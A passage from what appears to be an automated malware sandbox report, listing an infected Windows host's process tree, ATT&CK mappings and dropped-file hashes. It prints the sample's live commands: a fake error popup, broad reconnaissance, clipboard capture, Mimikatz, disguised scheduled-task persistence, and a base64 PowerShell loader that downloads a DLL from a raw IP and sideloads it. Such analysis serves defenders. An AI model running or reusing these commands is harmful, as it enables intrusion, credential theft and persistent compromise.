        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
        5⤵
        
        PID:700
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        6⤵
        
        PID:3700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:4224
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:1068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3088
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:2376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:4900
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:1820
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:3448
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:2844
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:2500
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:888
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        Network Service Discovery
        
        PID:4228
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:1224
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:4968
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        
        PID:4076
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:2804
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:4016
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:4904
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:2252
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:3584
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:3444
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:576
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:4720
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:988
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:2852
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:400
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:1212
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:572
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:2504
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:2360
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:4668
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        Network Service Discovery
        
        PID:4680
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:3536
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:1036
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:764
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4860
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4992
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3156
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:1820
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4900
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:1840
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:2900
- - C:\Users\Admin\Desktop\Files\win.exe
    "C:\Users\Admin\Desktop\Files\win.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:1560
  - - C:\Windows\SysWOW64\route.exe
      route print
      4⤵
      System Location Discovery: System Language Discovery
      PID:3400
  - - C:\Windows\SysWOW64\arp.exe
      arp -a 10.127.0.1
      4⤵
      Network Service Discovery
      System Location Discovery: System Language Discovery
      PID:1768
- - C:\Users\Admin\Desktop\Files\mimikatz.exe
    "C:\Users\Admin\Desktop\Files\mimikatz.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5028
- - C:\Users\Admin\Desktop\Files\pyl64.exe
    "C:\Users\Admin\Desktop\Files\pyl64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3828
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:3148
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:700
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:1676
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:784
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:1224
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:2480
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:3368
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:696
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:1912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1980
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:2732
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3176
- C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
  C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5064
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
  2⤵
  PID:2052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3204

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3796

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1809827666.exe.log

Filesize
425B

MD5
de75c43a265d0848584ae05945570edf

SHA1
69f95177914f8d8b2f278a91f585a0024b8dffd3

SHA256
d9bdf6a2bfdd9b2b5c8593de17ade3d8d317dad331aa6ca0da7483dd06db1140

SHA512
365f29c693dd7aa2ade092d765a96f20bf1f7fa93bca7f3b25aeddf5700817b9fd388e8f7d9f1b781c8a876739b06ad16d61e7ed08a1c85ac4be4686a38c63bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PURLOG.exe.log

Filesize
1KB

MD5
8d2a339197d37b8c742c0d76a94aff38

SHA1
8e014816925548186e001deff52ff28778deb063

SHA256
90ac5a646c5389ce54e23295504b6ba945ab6688d17fa3a85e4f2cca8d34fd19

SHA512
bf1d05f3a113073660ce66b9a6b1aeca43b9eddb67479c75a914b954df5e27e129b61caa7a5a0926bbd0a9e02ea74a81ec61f121f479ad7ef2c35cb0175276db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PerfWatson1.exe.log

Filesize
2KB

MD5
15eab799098760706ed95d314e75449d

SHA1
273fb07e40148d5c267ca53f958c5075d24c4444

SHA256
45030bd997f50bb52c481f7bc86fac5f375d08911bcc106b98d9d8f0c2ce9778

SHA512
50c125e2a98740db0a0122d7f4de97c50d84623e800b3d3e173049c8e28ff0fbe4add7677bc56cb2228f78ed17522f67ae8f1b85f62824012414ce38ce0b500c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
4764ec833397133003e2e24b080cd7ce

SHA1
03c8926d7afc4e605719aee53ef2ce53f6f314cc

SHA256
88331ffd23c1d6cfef379ab5366333f56ee41ff083f0421915302a492cb2a833

SHA512
e9ad86bc3878f4f3e1a38a191864857f24969e0f11d0636cb76523900e97b06d286c120460c38e7f93039356f45900d32ddda990abffb1958af173dfb1aedac1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e35ccc1fb2737f09352fdbd01a85ae3a

SHA1
035035ad9bbca97cb8273eb364ce73f6bc749dd1

SHA256
498dfcd7d9c850b922f1db5d4d2cee185839c611db03931b09313070dc628053

SHA512
2300d0f005fd1d5dfc5957877d15cda7215dda18ff6a4276bc3d6f405aa4769b71320a51cea88f9efd44bc2c8aeea5d5fc3a20509db2797cf47b6ecac4b9b5b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1431716774.exe

Filesize
20KB

MD5
2473392c0a773aad20da1519aa6f464b

SHA1
2068ffd843bb8c7c7749193f6d1c5f0a9b97b280

SHA256
3d33e8778ea8194d486d42784411e8528c602594abdf3e32cdcee521a10f3ce7

SHA512
5455866f5fc53ae48ff24222b40a264bf673102435abeac2a61ba6fcaa1de429d8f078d4d065cb5d77b96de87f343579651b718e0a60934fb9fa35818d948074

Download Submit
C:\Users\Admin\AppData\Local\Temp\1622938899.exe

Filesize
5.6MB

MD5
13b26b2c7048a92d6a843c1302618fad

SHA1
89c2dfc01ac12ef2704c7669844ec69f1700c1ca

SHA256
1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

SHA512
d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

Download Submit
C:\Users\Admin\AppData\Local\Temp\164314122.exe

Filesize
8KB

MD5
66ca91a3e8d4f9714b4bafacdae69acb

SHA1
e4582bbc4c220a5cdd8e7d18622c4bd5614d1bfa

SHA256
1377b8f0963af037caa6afda723945d55971b2fefaee6eb5993bbbcb91bc3f8d

SHA512
a2df2f2dd67b034606892257bf05ba0517f7d24b21f2c9561b08cae17e2e9a52216f8bf79ca6ecae7f0b6675310c3c5ac5764b1cc0031404f09203b01662d0ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\1716412561.exe

Filesize
10KB

MD5
2266f0aecd351e1b4092e82b941211ea

SHA1
1dced8d943494aa2be39ca28c876f8f736c76ef1

SHA256
cbbad0ab02cd973c9c4e73336e3bcd0849aeb2232a7bdbc38f0b50696b5c28c3

SHA512
6691cd697bbe7f7a03d9de33869aab289d0a1438b4ee194d2047ded957a726b1d3fe93f08e4a0c677018b20e2521aeb021ab1dc4d1a67927604829ddfd9d59aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\1809827666.exe

Filesize
8KB

MD5
cb8420e681f68db1bad5ed24e7b22114

SHA1
416fc65d538d3622f5ca71c667a11df88a927c31

SHA256
5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea

SHA512
baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\1888623094.exe

Filesize
11KB

MD5
83a784716728ca579619d0e13a9f17b0

SHA1
5e33ca9dab3c0df2edcd597b8b0da06c88f18f6b

SHA256
9dc0b007f33f768fff2249388428981d89cfcee3e5babd206bbaeb7d5cc34b4f

SHA512
f8218a8e977f0ec340e7139041cfff8bac4cc23bcea0c0c0d7717ead76093d45d10acd72a5846486e9348ce642f529824f1575d0d28b8d2f566c543c7c9d3bc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\193997\y

Filesize
662KB

MD5
d6a0473754ad77650d88eaa94cf4bcf0

SHA1
d2123bf8b796fe6f76e570641037d9420b3f3c78

SHA256
355d2dc53492ea6ba26263dd8a2f7544ae3a36c17f64cccb6ad84007bebafbb7

SHA512
14d844255fb657a039d4f94ddcc58acc79d44fdc58882ace49a453c537db86ceeef9a10640d83ff20af2caa0e880de3e77b7afbf2af79291873c0f81db72d3bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\2420715866.exe

Filesize
10KB

MD5
96509ab828867d81c1693b614b22f41d

SHA1
c5f82005dbda43cedd86708cc5fc3635a781a67e

SHA256
a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

SHA512
ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\2603430756.exe

Filesize
53KB

MD5
b92ad7e3c510355dd54db74cdf4d522e

SHA1
bf4e93257363aa26d02a2cafd1805566923b7ef4

SHA256
42a3d89601affbf702b44e56746f2ff19308848e49ba0fae86202345ab19c95f

SHA512
1462ebf284a4d20900aec239449693e5d5c73cfd1283d8a4aedc293f82b0b7ee3bc66aa3fdd916377c2e00f64212ce71e455fddd3b960c9de1c88b3886ddc388

Download Submit
C:\Users\Admin\AppData\Local\Temp\AFtqGY9CJmsw.bat

Filesize
210B

MD5
1db755f7e85b11ffa35cb6360da414af

SHA1
c738409f843505077b970a590f6897238af814f2

SHA256
8b76a01bd64e6b940f4e6425ead4525da571d6572c725754b4cadfe9cf6ae1fc

SHA512
99677c17aeaad52226038073e39c53dad20ced817526b98de3c722f702371404fb45fdf97887c7164948915e2cdb13cd2655d0a37a39fbf49fe278e1c62ed570

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ak

Filesize
63KB

MD5
2078e604090ab3f34e7254584f5b5e18

SHA1
6c6923837538fe0516a7395fd114c6000da29fdb

SHA256
9b129a2e4cef84ec4f1101524cdec497f7daeed3fda8cac227803772ebb80ca7

SHA512
af16f5679fc77dfd32c2bc2bfcaf80f56d633a3cb47941565f35ca84c5b385eeebd4caf8a703860a2e3b1a55a808a576a85ed0c5a6595ffa7d2fb0435dbee08f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autumn

Filesize
62KB

MD5
452ec03a6dc9758ff5c0d17f9e55572a

SHA1
194df13d1dd92f3c986bb1b196eebf6e25900412

SHA256
bd9b030da3887b0cb821ef37aab7771d7d048c05835c3eb5ee034cd077a85cd3

SHA512
f2d6979ac9915991020522d4c7218e431a437d9b06b40c395923fdacc514056f01ca127f4264697f0e49faf88b15df8eb6cca80f69e0983f4af7dcda51a87f6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bs

Filesize
52KB

MD5
5383c87dff2feb9b2c8e93c4bed93e34

SHA1
1487faf6f6e098fd878f4536bb99cf8c628b12a4

SHA256
963b21a66a6afd24e3c8eab4e9d3fa803caca58f2f1e2cbd2e80451ab2b5bb73

SHA512
af6219b70b180518f7a5866e95719e23a28394b814239f38250383511b7da1d3712dbd49be75e375f66226192dfc2d46dd905f0733e6bfffe13eeac3ef9f975d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Entity

Filesize
75KB

MD5
116177ea561e297830d84e68e4851a28

SHA1
80545b33450655d3e5e7c055aace79a31eadd3af

SHA256
3570fa88359a94df74450f1be19f8fb54e566270f968254ac56b616a424b8446

SHA512
86e8f3dc6a9b18f4e5a9f2cb1f58baabe782ca264105967987e0eae987f00eeece800ee4f3c126b95ea471c5fd6530d11a87bb9be5a7a2c66ea473b84be6f839

Download Submit
C:\Users\Admin\AppData\Local\Temp\Hist

Filesize
486B

MD5
01f1ebfab9f7716fd124ef8edd32a90f

SHA1
85a045dab05d4c1360f97f3e3d32679e844766c8

SHA256
379fdc3da78974a0332ec7b4c0704d500869ab83afadeba852cd2b510aec4f80

SHA512
3f1300fc81667a73026fe79f4984278e65d87ba1d2ccb1833c50319f5cf5d44a6865bd9ad8cd12586e0500f99c670174b8e544e440d7d5e3be27acf2e068e8b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Keyboards

Filesize
2KB

MD5
648848687fe144ab2925ff056f85e839

SHA1
ad8601e28076e553bdce4b49e5585d193ce9f26f

SHA256
68340ba1f2afcb31904ad77653b22b19601a86d2031b39ce320611fc26a30462

SHA512
ff5b5d86710242944a6c5a6ba6ec29e57e561ce156022243f0d6028a8ec2eba0d6f13dcb2ab007a5c38c5f69fb8bb5816ddcead72588626a6626bb1336f77b27

Download Submit
C:\Users\Admin\AppData\Local\Temp\Medicines

Filesize
63KB

MD5
394e00f0b18a19021b82919b0953a251

SHA1
3dfd4dbf28f4aa4c08c74b70662c01c950bf3ad9

SHA256
9d32778c46127d2af6991663c47dac68ac3424181063b44e82e3b82af73369a1

SHA512
b5e6c76075e19bdcbcd0ae4ccf9acb37154d84dbe1a17b9c2e40ce9e4d5b194774d608d812ae54f8f6331e255d3f1820a526eb8ad80b174babe6a39a2002f5f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Powell

Filesize
7KB

MD5
4ae2c64145fe81c75f62a1ac65904a58

SHA1
fd70229a1fcd534498c7179ca3a02abb6523a277

SHA256
315e74622a85b4dce78188b734154a595ff1a1a8cb191b2d92a95be1c0bdbc37

SHA512
bf81502fe99ba78b414577df49c86c98c8154f409c41ee536dcf29fe979a859e40561b3d97245ee76d9ccfc908f9a623372c77ec05b8a8e665777aae01a475a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Remained

Filesize
94KB

MD5
7eb0c07b15f6891636b5b18e6c8782eb

SHA1
41f132b6db4d2b5253e91d84e927995a00e96976

SHA256
a378de033ee73a1881a1d65e6a49686d087614d46286360698b639b62c097e84

SHA512
688e2327e9afb9561fb7b4e932efdd22ce56e0efdfcba80eb058cbabb6595c93216590290281a3ae34b45f623d2dd1325edfd5375f3caac129ae2d7b4777f754

Download Submit
C:\Users\Admin\AppData\Local\Temp\Scott

Filesize
96KB

MD5
7e600368be6cc5c03b1bf613a36885d1

SHA1
c0cc74598ef38940fc48ccb01fa27e9b27e80e62

SHA256
0b4bfde6485d29cba34de2cd28191b5fc21dfcd3aca109f68599e19a609cbe44

SHA512
b6b66babcadd81d4e4e5b62e778ea79acc2a48b9c0ab9bf81a7ec61f9f9ccf394bc16982b80f07b113645a24f209d68cddc733266d0f0e3d722567f120d425cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Statistical

Filesize
84KB

MD5
5822d1bc4305d9f19939768fdfbf4d31

SHA1
30949a77d5c66825c5255566a2c074142d114f04

SHA256
15ae29d30cebd36f8b499edd660444cb16e880ec5469e14c608f76a59f15faa7

SHA512
